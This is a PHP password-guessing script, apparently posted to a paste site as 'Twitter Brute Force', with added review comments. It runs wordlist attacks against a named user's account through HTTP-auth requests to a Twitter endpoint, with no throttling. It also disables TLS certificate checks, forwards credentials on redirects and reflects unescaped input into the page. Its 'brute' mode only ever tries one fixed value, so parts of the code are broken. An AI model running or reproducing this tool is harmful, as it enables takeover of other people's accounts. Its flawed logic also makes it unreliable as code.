
Bruteforce script

a guest
Jan 14th, 2016
  1. Twitter brute force
  2.  
// Wordlist path; the dictionary branch further down loads this file with file().
$dic ="pass.txt";
//////////////////////////////////////////////////////////////////////////



// Prints the page and a POST form: a 'username' text field plus two submit
// buttons that share the name 'attack' and carry the values 'dictionary' and
// 'brute'. Those two POST fields are the only request inputs the script reads.
echo "
<title>Twitter Brute Force By Mauritania Attacker</title>
</head>
<style type='text/css'>
body {


font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:BLUE;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>

</div>
</td>
</tr>
<tr>
<td>
<div align='center'>

</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Target User:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>

</div>
</td>
</tr>
</table>
";
// Sets variables and retrieves the endpoint's response to a request that
// carries no credentials. That body is kept in $wrong; check_correct() treats
// any later response that differs from it as a successful login.
if(isset($_POST['attack']) && isset($_POST['username'])) {
// Raw POST value, neither validated nor encoded; it is later concatenated into
// a URL and echoed into HTML as-is.
$username = $_POST['username'];
// Fixed header set sent with every request. The User-Agent and Accept-Language
// values never vary, so server-side logs would show one constant header
// fingerprint across all attempts made by this script.
$headers = array(
"Host: stream.twitter.com",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain is not verified, so the TLS peer is unauthenticated
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); // NOTE(review): libcurl enables hostname matching with 2, not 1 - confirm against the libcurl version in use
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // combined with FOLLOWLOCATION, credentials are also sent to any host a redirect points to
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
// Calls check_correct() once per wordlist line for the single submitted
// username, back to back, with no delay and no cap on attempts. On the server
// side this would appear as a run of rejected HTTP-auth requests for one
// account from one client, which is the pattern that per-account lockout and
// per-source rate limiting key on.
// $_POST['attack'] is read here without an isset() guard.
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
// The result page is built by string concatenation. $username is raw POST
// input and is not passed through htmlspecialchars(), so it is reflected
// unescaped; the matched candidate is printed in clear text.
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
// Reached only when no wordlist line was reported as a match; $username is
// again echoed without escaping.
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
// NOTE(review): not an exhaustive search as written; the only candidate value
// this loop assigns is the literal "a".
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
// Closes the document opened by the first echo.
echo "</body>
</html>";
// Function for checking whether the username and password are correct.
//
// Sends one request with the candidate credentials placed in the URL's
// userinfo part and compares the response body with the baseline in $wrong.
//
// $username  account name, taken unmodified from the POST form
// $password  candidate password for this attempt
// Returns true when the response body is not loosely equal (!=) to $wrong,
// false otherwise. The check never inspects the HTTP status, so any response
// that differs from the baseline is reported as a match - presumably including
// throttling or error pages; curl_exec() returning false on a transport
// failure would also compare unequal to a non-empty baseline.
function check_correct($username, $password)
{
// Relies on globals populated by the top-level baseline request.
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain is not verified; the credentials travel over an unauthenticated TLS session
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); // NOTE(review): libcurl enables hostname matching with 2, not 1 - confirm against the libcurl version in use
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // combined with FOLLOWLOCATION, credentials are also sent to any host a redirect points to
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
  163.  
  164. ?>